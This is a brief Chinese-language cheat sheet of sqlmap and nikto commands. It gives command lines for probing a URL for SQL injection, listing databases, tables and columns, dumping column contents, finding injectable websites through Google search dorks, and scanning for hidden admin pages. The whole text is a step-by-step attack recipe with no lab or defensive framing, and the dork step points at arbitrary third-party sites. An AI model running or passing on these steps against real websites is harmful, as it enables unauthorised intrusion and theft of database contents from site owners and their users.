扫描漏洞:sqlmap -u 网址 –dbs –current-user 拆表名:sqlmap -u 网址 –tables 拆列:sqlmap -u 网址 -T 表名 –columns 获取列的字段:sqlmap -u 网址 -T 表名 -C 列名,若多个列用, 分隔 –dump 利用谷歌找可sql 注入的网站:sqlmap -g 搜索指令 用nikto 扫描隐藏文件来找管理页面:nikto -host 网址 或者查看网页源码,看有没有什么发现。